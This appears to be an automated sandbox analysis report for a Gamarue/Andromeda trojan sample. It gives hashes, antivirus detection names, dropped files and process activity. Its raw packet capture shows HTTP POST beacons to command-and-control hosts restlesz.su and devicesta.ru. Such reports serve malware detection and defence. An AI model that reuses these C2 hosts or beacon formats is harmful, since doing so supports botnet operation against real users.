Analysis Date2018-04-22 18:41:37
MD564aabc259b14e2118a6a0314a1d537fd
SHA1fbdbb3080ecd3d6ba3adcdaea4c2cde249e5421f

Static Details:

File typePE32 executable (GUI) Intel 80386, for MS Windows
PEhash
AVArcabit (arcavir)Gen:Variant.Symmi.28546
AVAuthentiumW32/Trojan.KYQA-2633
AVGrisoft (avg)Error Scanning File
AVAvira (antivir)TR/BAS.Samca.13317892
AVAlwil (avast)Bundpil-C [Trj]
AVAd-AwareGen:Variant.Symmi.28546
AVBitDefenderGen:Variant.Symmi.28546
AVBullGuardError Scanning File
AVClamAVWin.Trojan.Agent-1109687
AVDr. WebBackDoor.Andromeda.178
AVEmsisoftGen:Variant.Symmi.28546
AVMicroWorld (escan)Gen:Variant.Symmi.28546
AVCA (E-Trust Ino)Error Scanning File
AVFortinetW32/Wauchos.LB!tr
AVFrisk (f-prot)W32/Trojan2.OAPW
AVF-SecureTrojan-Downloader:W32/Wauchos.F
AVIkarusTrojan-Downloader.Small
AVK7Trojan ( 0001140e1 )
AVKasperskyError Scanning File
AVMalwareBytesTrojan.Email.Bot
AVMcafeeW32/Worm-FKO!64AABC259B14
AVMicrosoft Security EssentialsWorm:Win32/Gamarue.I
AVNANOTrojan.Win32.Andromeda.cjgqby
AVNANOTrojan.Win32.Andromeda.dpkxyv
AVEset (nod32)Win32/TrojanDownloader.Wauchos.L
AVPadvishWorm.Win32.Gamarue.SameMsiexec1
AVCAT (quickheal)Worm.Gamarue.A5
AVRisingNo Virus
AV360 SafeTrojan.Win32.Agent.FN
AVSUPERAntiSpywareTrojan.Agent/Gen-FalComp
AVSymantecDownloader.Dromedan
AVTrend MicroWORM_GAMARUE.SMV
AVTwisterTrojan.3F06E5417E4C04E9
AVVirusBlokAda (vba32)SScope.Malware-Cryptor.Wauchos.2183
AVWindows DefenderWorm:Win32/Gamarue.F
AVZillya!Error Scanning File

Runtime Details:

Screenshot

Process
↳ C:\Windows\System32\lsass.exe

Process
↳ C:\Users\Phil\AppData\Local\Temp\fbdbb3080ecd3d6ba3adcdaea4c2cde249e5421f.exe

Process
↳ C:\Users\Phil\AppData\Local\Temp\fbdbb3080ecd3d6ba3adcdaea4c2cde249e5421f.exe

Creates FileC:\Windows\SysWOW64\msiexec.exe

Process
↳ C:\Windows\SysWOW64\msiexec.exe

Creates Mutex3770066751
Creates FileC:\Windows\Globalization\Sorting\sortdefault.nls
Creates FileC:\Users\Phil\AppData\Local\Temp\fbdbb3080ecd3d6ba3adcdaea4c2cde249e5421f.exe
Creates FileC:\ProgramData\Local Settings\Temp\ccweav.exe
Creates FileC:\Windows\SysWOW64\msiexec.exe
Creates FileC:\ProgramData\Local Settings\Temp\ccweav.exe

Network Details:


Raw Pcap
0x00000000 (00000)   504f5354 202f6761 7465322e 70687020   POST /gate2.php 
0x00000010 (00016)   48545450 2f312e31 0d0a486f 73743a20   HTTP/1.1..Host: 
0x00000020 (00032)   72657374 6c65737a 2e73750d 0a557365   restlesz.su..Use
0x00000030 (00048)   722d4167 656e743a 204d6f7a 69316c61   r-Agent: Mozi1la
0x00000040 (00064)   2f342e30 0d0a436f 6e74656e 742d5479   /4.0..Content-Ty
0x00000050 (00080)   70653a20 6170706c 69636174 696f6e2f   pe: application/
0x00000060 (00096)   782d7777 772d666f 726d2d75 726c656e   x-www-form-urlen
0x00000070 (00112)   636f6465 640d0a43 6f6e7465 6e742d4c   coded..Content-L
0x00000080 (00128)   656e6774 683a2038 300d0a43 6f6e6e65   ength: 80..Conne
0x00000090 (00144)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x000000a0 (00160)   75707163 68433435 75315446 462b4a6d   upqchC45u1TFF+Jm
0x000000b0 (00176)   6e594b47 4977694c 71587779 4773436f   nYKGIwiLqXwyGsCo
0x000000c0 (00192)   41334f75 74314168 33486156 73516a34   A3Out1Ah3HaVsQj4
0x000000d0 (00208)   35594371 474b326c 58663250 76494d65   5YCqGK2lXf2PvIMe
0x000000e0 (00224)   744a337a 4d526f44 4c555139 35533438   tJ3zMRoDLUQ95S48
0x000000f0 (00240)                                         

0x00000000 (00000)   504f5354 202f3030 31316c64 722e7068   POST /0011ldr.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 486f7374   p HTTP/1.1..Host
0x00000020 (00032)   3a207265 73746c65 737a2e73 750d0a55   : restlesz.su..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a6931   ser-Agent: Mozi1
0x00000040 (00064)   6c612f34 2e300d0a 436f6e74 656e742d   la/4.0..Content-
0x00000050 (00080)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000060 (00096)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000070 (00112)   656e636f 6465640d 0a436f6e 74656e74   encoded..Content
0x00000080 (00128)   2d4c656e 6774683a 2038300d 0a436f6e   -Length: 80..Con
0x00000090 (00144)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000000a0 (00160)   0d0a7570 71636843 34357531 5446462b   ..upqchC45u1TFF+
0x000000b0 (00176)   4a6d6e59 4b474977 694c7158 77794773   JmnYKGIwiLqXwyGs
0x000000c0 (00192)   436f4133 4f757431 41683348 61567351   CoA3Out1Ah3HaVsQ
0x000000d0 (00208)   6a343559 4371474b 326c5866 32507649   j45YCqGK2lXf2PvI
0x000000e0 (00224)   4d65744a 337a4d52 6f444c55 51393553   MetJ3zMRoDLUQ95S
0x000000f0 (00240)   3438                                  48

0x00000000 (00000)   504f5354 202f3030 32326c64 722e7068   POST /0022ldr.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 486f7374   p HTTP/1.1..Host
0x00000020 (00032)   3a207265 73746c65 737a2e73 750d0a55   : restlesz.su..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a6931   ser-Agent: Mozi1
0x00000040 (00064)   6c612f34 2e300d0a 436f6e74 656e742d   la/4.0..Content-
0x00000050 (00080)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000060 (00096)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000070 (00112)   656e636f 6465640d 0a436f6e 74656e74   encoded..Content
0x00000080 (00128)   2d4c656e 6774683a 2038300d 0a436f6e   -Length: 80..Con
0x00000090 (00144)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000000a0 (00160)   0d0a7570 71636843 34357531 5446462b   ..upqchC45u1TFF+
0x000000b0 (00176)   4a6d6e59 4b474977 694c7158 77794773   JmnYKGIwiLqXwyGs
0x000000c0 (00192)   436f4133 4f757431 41683348 61567351   CoA3Out1Ah3HaVsQ
0x000000d0 (00208)   6a343559 4371474b 326c5866 32507649   j45YCqGK2lXf2PvI
0x000000e0 (00224)   4d65744a 337a4d52 6f444c55 51393553   MetJ3zMRoDLUQ95S
0x000000f0 (00240)   3438                                  48

0x00000000 (00000)   504f5354 202f3030 3034346c 64722e70   POST /00044ldr.p
0x00000010 (00016)   68702048 5454502f 312e310d 0a486f73   hp HTTP/1.1..Hos
0x00000020 (00032)   743a2072 6573746c 65737a2e 73750d0a   t: restlesz.su..
0x00000030 (00048)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000040 (00064)   316c612f 342e300d 0a436f6e 74656e74   1la/4.0..Content
0x00000050 (00080)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000060 (00096)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000070 (00112)   6c656e63 6f646564 0d0a436f 6e74656e   lencoded..Conten
0x00000080 (00128)   742d4c65 6e677468 3a203830 0d0a436f   t-Length: 80..Co
0x00000090 (00144)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x000000a0 (00160)   0a0d0a75 70716368 43343575 31544646   ...upqchC45u1TFF
0x000000b0 (00176)   2b4a6d6e 594b4749 77694c71 58777947   +JmnYKGIwiLqXwyG
0x000000c0 (00192)   73436f41 334f7574 31416833 48615673   sCoA3Out1Ah3HaVs
0x000000d0 (00208)   516a3435 59437147 4b326c58 66325076   Qj45YCqGK2lXf2Pv
0x000000e0 (00224)   494d6574 4a337a4d 526f444c 55513935   IMetJ3zMRoDLUQ95
0x000000f0 (00240)   533438                                S48

0x00000000 (00000)   504f5354 202f3030 3035356c 64722e70   POST /00055ldr.p
0x00000010 (00016)   68702048 5454502f 312e310d 0a486f73   hp HTTP/1.1..Hos
0x00000020 (00032)   743a2072 6573746c 65737a2e 73750d0a   t: restlesz.su..
0x00000030 (00048)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000040 (00064)   316c612f 342e300d 0a436f6e 74656e74   1la/4.0..Content
0x00000050 (00080)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000060 (00096)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000070 (00112)   6c656e63 6f646564 0d0a436f 6e74656e   lencoded..Conten
0x00000080 (00128)   742d4c65 6e677468 3a203830 0d0a436f   t-Length: 80..Co
0x00000090 (00144)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x000000a0 (00160)   0a0d0a75 70716368 43343575 31544646   ...upqchC45u1TFF
0x000000b0 (00176)   2b4a6d6e 594b4749 77694c71 58777947   +JmnYKGIwiLqXwyG
0x000000c0 (00192)   73436f41 334f7574 31416833 48615673   sCoA3Out1Ah3HaVs
0x000000d0 (00208)   516a3435 59437147 4b326c58 66325076   Qj45YCqGK2lXf2Pv
0x000000e0 (00224)   494d6574 4a337a4d 526f444c 55513935   IMetJ3zMRoDLUQ95
0x000000f0 (00240)   533438                                S48

0x00000000 (00000)   504f5354 202f6761 74653032 2e706870   POST /gate02.php
0x00000010 (00016)   20485454 502f312e 310d0a48 6f73743a    HTTP/1.1..Host:
0x00000020 (00032)   20646576 69636573 74612e72 750d0a55    devicesta.ru..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a6931   ser-Agent: Mozi1
0x00000040 (00064)   6c612f34 2e300d0a 436f6e74 656e742d   la/4.0..Content-
0x00000050 (00080)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000060 (00096)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000070 (00112)   656e636f 6465640d 0a436f6e 74656e74   encoded..Content
0x00000080 (00128)   2d4c656e 6774683a 2038300d 0a436f6e   -Length: 80..Con
0x00000090 (00144)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000000a0 (00160)   0d0a7570 71636843 34357531 5446462b   ..upqchC45u1TFF+
0x000000b0 (00176)   4a6d6e59 4b474977 694c7158 77794773   JmnYKGIwiLqXwyGs
0x000000c0 (00192)   436f4133 4f757431 41683348 61567351   CoA3Out1Ah3HaVsQ
0x000000d0 (00208)   6a343559 4371474b 326c5866 32507649   j45YCqGK2lXf2PvI
0x000000e0 (00224)   4d65744a 337a4d52 6f444c55 51393553   MetJ3zMRoDLUQ95S
0x000000f0 (00240)   343838                                488


Strings